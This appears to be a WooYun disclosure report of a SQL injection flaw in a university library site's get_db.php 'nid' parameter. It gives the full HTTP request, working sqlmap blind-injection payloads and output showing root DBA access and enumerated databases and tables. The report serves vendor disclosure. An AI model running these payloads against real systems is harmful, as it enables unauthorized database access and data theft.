乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
RT
GET /do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3*&page=1&rows=20&type=zm HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://lib.cufe.edu.cnCookie: cufeUSR2=cccjjtxv%090%091448790599%09http%3A%2F%2Flib.cufe.edu.cn%2Fdo%2Fget_db.php%3Fnid%3D3%26page%3D1%26type%3Dfid%26id_sort%3D13%26rows%3D20%26c%3D%26d%3D%26div%3Dcontent%260.3172887838445604; star_time=1448790311; cufestat_client_1=790947%0929%0934fe41959c661d5d3e5c5a70d52806c1; cufestat_client_uv_1=29; CNZZDATA1253322731=1532733387-1448790319-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1448790319; cod=; csd=169Host: lib.cufe.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
nid参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND 4748=4748&page=1&rows=20&type=zm Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND (SELECT * FROM (SELECT(SLEEP(5)))YWYM)&page=1&rows=20&type=zm---web application technology: PHP 5.6.8, Apache 2.4.12back-end DBMS: MySQL 5.0.12current user: 'root@localhost'current database: 'cufe'current user is DBA: Trueavailable databases [4]:[*] cufe[*] information_schema[*] mysql[*] test
[22:18:42] [INFO] fetching tables for database: 'cufe'[22:18:42] [INFO] fetching number of tables for database 'cufe'[22:18:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[22:18:42] [INFO] retrieved: 58[22:18:57] [INFO] retrieved: ice_admin_menu[22:21:23] [INFO] retrieved: ice_area[22:22:08] [INFO] retrieved: ice_article[22:23:15] [INFO] retrieved: ice_article_db[22:24:08] [INFO] retrieved: ice_ask_cache[22:25:41] [INFO] retrieved: ice_ask_config[22:26:51] [INFO] retrieved: ice_ask_form[22:27:51] [INFO] retrieved: ice_ask_form_element[22:29:32] [INFO] retrieved: ice_ask_sor[22:30:53] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)t[22:31:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[22:31:36] [INFO] retrieved: ice_ask_student[22:32:57] [INFO] retrieved: ice_ask_student
DBA权限,mysql的,被写shell就不好了.
危害等级:中
漏洞Rank:10
确认时间:2015-12-02 14:38
超级用户的数据问题
暂无